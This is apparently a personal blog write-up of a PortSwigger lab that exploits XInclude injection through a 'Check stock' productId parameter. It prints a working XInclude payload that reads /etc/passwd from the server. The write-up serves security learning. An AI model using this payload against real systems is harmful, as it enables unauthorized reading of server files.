XInclude to Retrieve Files: Lab WriteUp

3 min readSep 8, 2024

Introduction

In the realm of web security, understanding how to exploit and defend against XML-related vulnerabilities is crucial. Recently, I delved into a PortsSwigger lab that focused on exploiting XInclude to retrieve files from a server. This write-up documents my approach, findings, and the steps taken to uncover and exploit the vulnerability.

Understanding the Lab Context

The lab presents a web application with a “Check stock” feature that embeds user input inside a server-side XML document. The goal is to manipulate this input to retrieve the contents of the /etc/passwd file, a file often targeted in security exercises to demonstrate the potential impact of file disclosure vulnerabilities.

At first glance, this might seem like a classic XML External Entity (XXE) attack. However, this scenario was slightly different; I didn’t have control over the entire XML document, which ruled out a direct XXE attack. Instead, the challenge was to use an XInclude statement to achieve the same outcome.

Reconnaissance and Initial Observations

Upon inspecting the application, I identified that the productId parameter in the /product/stock endpoint was likely vulnerable. Using Burp Suite, I began by sending a few test requests to see how the application handled different inputs. The HTTP request and response patterns suggested that the productId parameter was being processed as part of an XML document on the server.

The server’s response provided the usual stock check information, but I noticed that malformed or unexpected inputs led to different responses, hinting at how the XML parser handled these cases. This was my cue to explore further.

Crafting the XInclude Payload

Understanding that the productId parameter could be a vector for XML manipulation, I decided to use the XInclude payload from PayloadAllTheThings. XInclude allows XML documents to include data from external sources, making it a potential tool for retrieving files from the server.

The payload I designed aimed to include the contents of the /etc/passwd file:

<xi:include parse="text" href="file:///etc/passwd"/>

This XInclude statement was then injected into the productId parameter:

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>

Executing the Payload

With the payload ready, I injected it into the productId parameter and submitted the request. The server's response was as anticipated, it included the contents of the /etc/passwd file. This confirmed that the XInclude injection was successful, and the lab was effectively completed.

Reflections and Takeaways

This exercise underscores the importance of secure XML processing in web applications. Features like XInclude, while useful, can be misused if not properly secured. In real-world scenarios, vulnerabilities like these could lead to significant data breaches or unauthorized access to sensitive files.

As I continue to explore the depths of web security, exercises like this reinforce the need for a robust understanding of different attack vectors and the importance of thorough security testing.

Conclusion

This lab provided a valuable opportunity to experiment with and understand the nuances of XInclude-based attacks. If you’re exploring web security, I highly recommend working through similar labs on PortsSwigger’s platform. They offer a hands-on approach to learning that is both challenging and rewarding.